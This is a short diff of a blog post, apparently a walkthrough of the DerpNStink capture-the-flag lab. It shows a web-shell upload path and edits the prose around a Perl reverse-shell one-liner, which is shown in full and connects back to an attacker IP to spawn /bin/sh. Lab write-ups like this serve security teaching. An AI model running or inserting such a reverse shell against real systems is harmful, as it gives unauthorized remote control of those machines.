limbernie/limbernie.github.io/_posts/2018-03-28-derpnstink-walkthrough.md

 The uploaded file is at `http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/cmd.php`.

-### Low Privilege Shell
+### Low-Privilege Shell

 After the upload, the next step is to trigger a reverse shell.
-Whenever possible, I like to use Perl for my reverse shell.
+Whenever possible, I like to use Perl for my reverse shell; the reason being Perl is widely available in most Linux distributions.

 ```perl
 perl -e 'use Socket;$i="192.168.10.129";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'